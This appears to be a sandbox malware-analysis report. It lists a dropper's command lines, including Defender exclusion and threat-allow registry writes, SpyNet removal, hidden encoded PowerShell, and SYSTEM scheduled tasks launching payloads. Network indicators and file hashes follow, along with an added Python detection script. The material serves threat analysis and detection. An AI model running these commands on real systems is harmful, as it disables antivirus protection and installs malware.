"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FgzgbZZAFicU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FgzgbZZAFicU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LYowOqXOU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LYowOqXOU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PnlHXrUXYeUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PnlHXrUXYeUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qeprHDpCnlqFkbDgwPR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qeprHDpCnlqFkbDgwPR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xWNndLwYWxPLC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xWNndLwYWxPLC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\uOkirCjeoMUvNKVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\uOkirCjeoMUvNKVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\SafQccDpCMVtGOrp\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\SafQccDpCMVtGOrp\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FgzgbZZAFicU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FgzgbZZAFicU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FgzgbZZAFicU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LYowOqXOU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LYowOqXOU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PnlHXrUXYeUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PnlHXrUXYeUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qeprHDpCnlqFkbDgwPR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qeprHDpCnlqFkbDgwPR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xWNndLwYWxPLC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xWNndLwYWxPLC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\uOkirCjeoMUvNKVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\uOkirCjeoMUvNKVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\SafQccDpCMVtGOrp /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\SafQccDpCMVtGOrp /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gBGfdOZyo" /SC once /ST 01:33:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gBGfdOZyo"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gBGfdOZyo"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "imJjYhUpaoZYZHtqO" /SC once /ST 01:37:37 /RU "SYSTEM" /TR "\"C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe\" HI /BKsite_idUjG 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "imJjYhUpaoZYZHtqO"

C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe

C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe HI /BKsite_idUjG 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bnTqljwkAIckBwCXiX"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\LYowOqXOU\SEZhTv.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "PrqbyCvyRaPTCyA" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "PrqbyCvyRaPTCyA2" /F /xml "C:\Program Files (x86)\LYowOqXOU\qwhXIaI.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "PrqbyCvyRaPTCyA"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "PrqbyCvyRaPTCyA"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "EJkQkmQiAqyKIE" /F /xml "C:\Program Files (x86)\FgzgbZZAFicU2\tzpDtvt.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "eaHFzrxPPpjLp2" /F /xml "C:\ProgramData\uOkirCjeoMUvNKVB\CWEiTPx.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "xjLLdQpZPaFaxvNZz2" /F /xml "C:\Program Files (x86)\qeprHDpCnlqFkbDgwPR\PIalxcO.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "dfmYRzBlaRqgkDuyWQh2" /F /xml "C:\Program Files (x86)\xWNndLwYWxPLC\JAwGJlf.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ovLFxavpEMJUeWygf" /SC once /ST 00:38:47 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\SafQccDpCMVtGOrp\yQsvKirx\lMbqfeR.dll\",#1 /Phsite_idzPm 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "ovLFxavpEMJUeWygf"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\SafQccDpCMVtGOrp\yQsvKirx\lMbqfeR.dll",#1 /Phsite_idzPm 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\SafQccDpCMVtGOrp\yQsvKirx\lMbqfeR.dll",#1 /Phsite_idzPm 385118

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "imJjYhUpaoZYZHtqO"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ovLFxavpEMJUeWygf"
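The reg.exe, schtasks and gpupdate lines above are the evasion core of this run: ThreatIDDefaultAction entries are written with data 6 (the Defender action code for Allow) for a fixed list of threat IDs, the dropper's own directories are added under Exclusions\Paths, every write is duplicated into the 32-bit and 64-bit registry views (/reg:32 and /reg:64), SpyNetReporting is removed from the Spynet policy key, and the -EncodedCommand blob is base64 of UTF-16LE that decodes to start-process -WindowStyle Hidden gpupdate.exe /force, the policy refresh that makes the new keys take effect. The script below is an added example written for this page; it is not part of the sandbox report and not the vendor's signature logic. It runs the corresponding detection rules over process command lines copied from this listing (plus one constructed benign reg.exe write as a control) and decodes the encoded PowerShell. The rule names, the tokenizer and the parse_reg helper are this example's own assumptions.

```python
import base64
import re

# Defender threat-action codes as used by the ThreatIDDefaultAction policy
# (same numbering as Set-MpPreference -ThreatIDDefaultAction_Actions).
DEFENDER_ACTIONS = {"1": "Clean", "2": "Quarantine", "3": "Remove", "6": "Allow",
                    "8": "UserDefined", "9": "NoAction", "10": "Block"}
DEFENDER_POLICY = r"hklm\software\policies\microsoft\windows defender"

# Constructed sample: process command lines copied from this report's listing,
# plus one benign reg.exe write (last entry) that must not trigger anything.
SAMPLE_CMDLINES = [
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64',
    r'"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FgzgbZZAFicU2" /t REG_DWORD /d 0 /reg:32',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\SafQccDpCMVtGOrp /t REG_DWORD /d 0 /reg:64',
    r'REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==',
    r'"C:\Windows\system32\gpupdate.exe" /force',
    r'"C:\Windows\system32\reg.exe" ADD "HKCU\Software\ExampleApp" /f /v Theme /t REG_SZ /d dark',
]


def tokenize(cmdline):
    """Split a Windows command line into arguments, honouring double quotes."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def parse_reg(tokens):
    """Parse a reg.exe ADD/DELETE invocation (also when wrapped in cmd /C).

    Returns {'op', 'key', 'v', 'd', 'view'} with the key lower-cased, or None.
    """
    idx = next((i for i, t in enumerate(tokens)
                if t.lower() in ("reg", "reg.exe") or t.lower().endswith("\\reg.exe")), None)
    if idx is None or len(tokens) < idx + 3:
        return None
    op = tokens[idx + 1].lower()
    if op not in ("add", "delete"):
        return None
    info = {"op": op, "key": tokens[idx + 2].lower(), "v": None, "d": None, "view": None}
    rest = tokens[idx + 3:]
    for i, tok in enumerate(rest):
        low = tok.lower()
        if low in ("/v", "/d") and i + 1 < len(rest):
            info[low[1]] = rest[i + 1]          # value name / data
        elif low.startswith("/reg:"):
            info["view"] = low[5:]              # 32- or 64-bit registry view
    return info


def decode_encoded_command(cmdline):
    """Decode PowerShell -EncodedCommand (base64 of UTF-16LE); None if absent or invalid."""
    m = re.search(r"-e(?:ncodedcommand|ncoded|nc|c)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan(cmdlines):
    """Apply the Defender-tampering rules to each command line; return findings."""
    findings = []
    for n, cmd in enumerate(cmdlines):
        hits = []
        reg = parse_reg(tokenize(cmd))
        if reg and reg["key"].startswith(DEFENDER_POLICY):
            sub = reg["key"][len(DEFENDER_POLICY):]
            if reg["op"] == "add" and sub == r"\threats\threatiddefaultaction":
                action = DEFENDER_ACTIONS.get(reg["d"], "unknown(%s)" % reg["d"])
                rule = "defender_threat_allow" if reg["d"] == "6" else "defender_threat_action"
                hits.append((rule, "threat ID %s -> %s, view %s" % (reg["v"], action, reg["view"])))
            elif reg["op"] == "add" and sub == r"\exclusions\paths":
                hits.append(("defender_exclusion_path", "%s, view %s" % (reg["v"], reg["view"])))
            elif reg["op"] == "delete" and sub == r"\spynet" and (reg["v"] or "").lower() == "spynetreporting":
                hits.append(("defender_spynet_disabled", "cloud reporting policy removed, view %s" % reg["view"]))
            else:
                hits.append(("defender_policy_write", "%s %s" % (reg["op"], reg["key"])))
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            hits.append(("encoded_powershell", decoded))
        if re.search(r'\bgpupdate(?:\.exe)?"?\s+/force', cmd, re.I):
            hits.append(("gpupdate_force", "policy refresh applies the keys written above"))
        findings.extend({"line": n, "rule": r, "detail": d} for r, d in hits)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_CMDLINES):
        print("line %d  %-26s %s" % (f["line"], f["rule"], f["detail"]))
```

Two things to keep in mind when running rules like these over real telemetry: the /reg:32 and /reg:64 pairs mean every tamper appears twice, and the cmd /C parent plus its reg.exe child mean the same REG ADD appears as two process events, so deduplicate on key, value name and view before alerting. The catch-all defender_policy_write rule is what picks up the later REG DELETE of the Exclusions\Extensions "exe" value, the cleanup step this sample performs after its payloads have run.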

Network

Country Destination Domain Proto
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
US 172.67.169.89:443 yip.su tcp
US 8.8.8.8:53 galandskiyher5.com udp
US 8.8.8.8:53 voxel.dofuly.info udp
US 8.8.8.8:53 sty.ink udp
DE 185.172.128.126:80 185.172.128.126 tcp
US 8.8.8.8:53 net.geo.opera.com udp
NL 91.92.250.47:80 91.92.250.47 tcp
NL 91.92.250.47:80 91.92.250.47 tcp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
US 8.8.8.8:53 89.169.67.172.in-addr.arpa udp
US 104.21.13.170:443 sty.ink tcp
US 104.21.62.68:80 voxel.dofuly.info tcp
NL 185.26.182.111:80 net.geo.opera.com tcp
NL 185.26.182.111:443 net.geo.opera.com tcp
RU 81.94.159.197:80 galandskiyher5.com tcp
US 8.8.8.8:53 564675367.xyz udp
SK 45.95.11.69:443 564675367.xyz tcp
US 8.8.8.8:53 126.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 47.250.92.91.in-addr.arpa udp
US 8.8.8.8:53 68.62.21.104.in-addr.arpa udp
US 8.8.8.8:53 170.13.21.104.in-addr.arpa udp
US 8.8.8.8:53 111.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 197.159.94.81.in-addr.arpa udp
US 8.8.8.8:53 69.11.95.45.in-addr.arpa udp
DE 185.172.128.90:80 185.172.128.90 tcp
US 8.8.8.8:53 90.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
DE 185.172.128.187:80 185.172.128.187 tcp
DE 185.172.128.145:80 185.172.128.145 tcp
US 8.8.8.8:53 187.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 145.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
NL 185.26.182.124:443 autoupdate.geo.opera.com tcp
NL 185.26.182.124:443 autoupdate.geo.opera.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 124.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 121.217.145.82.in-addr.arpa udp
US 8.8.8.8:53 features.opera-api2.com udp
US 8.8.8.8:53 download.opera.com udp
NL 82.145.216.23:443 download.opera.com tcp
US 8.8.8.8:53 23.216.145.82.in-addr.arpa udp
NL 185.26.182.111:443 features.opera-api2.com tcp
US 8.8.8.8:53 download3.operacdn.com udp
GB 95.101.143.176:443 download3.operacdn.com tcp
US 8.8.8.8:53 176.143.101.95.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 trad-einmyus.com udp
RU 81.94.159.197:80 galandskiyher5.com tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 sdfjhuz.com udp
DE 185.172.128.187:80 185.172.128.187 tcp
KR 220.82.134.210:80 sdfjhuz.com tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
RU 5.42.64.44:80 5.42.64.44 tcp
US 8.8.8.8:53 210.134.82.220.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
RU 5.42.64.44:80 5.42.64.44 tcp
US 8.8.8.8:53 44.64.42.5.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
RU 5.42.64.44:80 5.42.64.44 tcp
US 8.8.8.8:53 api.2ip.ua udp
US 172.67.139.220:443 api.2ip.ua tcp
US 8.8.8.8:53 220.139.67.172.in-addr.arpa udp
US 8.8.8.8:53 sportessentia.home.pl udp
PL 79.96.138.166:443 sportessentia.home.pl tcp
RU 5.42.64.44:80 5.42.64.44 tcp
US 8.8.8.8:53 166.138.96.79.in-addr.arpa udp
US 8.8.8.8:53 3.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 m2reg.ulm.ac.id udp
ID 103.23.232.80:80 m2reg.ulm.ac.id tcp
US 8.8.8.8:53 80.232.23.103.in-addr.arpa udp
US 8.8.8.8:53 theonlyreasonwhywe.pro udp
US 172.67.218.191:443 theonlyreasonwhywe.pro tcp
US 8.8.8.8:53 wisemassiveharmonious.shop udp
US 8.8.8.8:53 colorfulequalugliess.shop udp
US 104.21.19.68:443 colorfulequalugliess.shop tcp
US 8.8.8.8:53 191.218.67.172.in-addr.arpa udp
US 8.8.8.8:53 68.19.21.104.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 121.150.80.3.in-addr.arpa udp
US 8.8.8.8:53 40.13.222.173.in-addr.arpa udp
US 8.8.8.8:53 193.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.200.46:443 clients2.google.com tcp
US 8.8.8.8:53 202.187.250.142.in-addr.arpa udp
LT 91.211.247.248:53 bxuuqnw.com udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 216.58.201.97:443 clients2.googleusercontent.com tcp
TR 195.16.74.230:80 bxuuqnw.com tcp
US 8.8.8.8:53 46.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 248.247.211.91.in-addr.arpa udp
US 8.8.8.8:53 97.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 230.74.16.195.in-addr.arpa udp
GB 142.250.200.46:443 clients2.google.com tcp
US 8.8.8.8:53 api3.check-data.xyz udp
US 44.235.39.212:80 api3.check-data.xyz tcp
US 8.8.8.8:53 212.39.235.44.in-addr.arpa udp

Files

memory/456-0-0x0000023D41140000-0x0000023D411A6000-memory.dmp

memory/456-1-0x00007FFD659E0000-0x00007FFD664A1000-memory.dmp

memory/456-2-0x0000023D5B710000-0x0000023D5B720000-memory.dmp

memory/456-3-0x0000023D5C080000-0x0000023D5C0DC000-memory.dmp

memory/652-4-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2496-5-0x00007FFD659E0000-0x00007FFD664A1000-memory.dmp

memory/2496-11-0x000002B7EB3E0000-0x000002B7EB402000-memory.dmp

memory/2496-12-0x000002B7EAED0000-0x000002B7EAEE0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dqmxqo3i.kko.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/652-17-0x0000000075360000-0x0000000075B10000-memory.dmp

memory/2496-18-0x000002B7EAED0000-0x000002B7EAEE0000-memory.dmp

memory/652-19-0x0000000002F20000-0x0000000002F30000-memory.dmp

memory/2496-22-0x00007FFD659E0000-0x00007FFD664A1000-memory.dmp

memory/456-23-0x00007FFD659E0000-0x00007FFD664A1000-memory.dmp

C:\Users\Admin\Pictures\PfWprLlupOSxC8b7ekM8atIx.exe

MD5 5b423612b36cde7f2745455c5dd82577
SHA1 0187c7c80743b44e9e0c193e993294e3b969cc3d
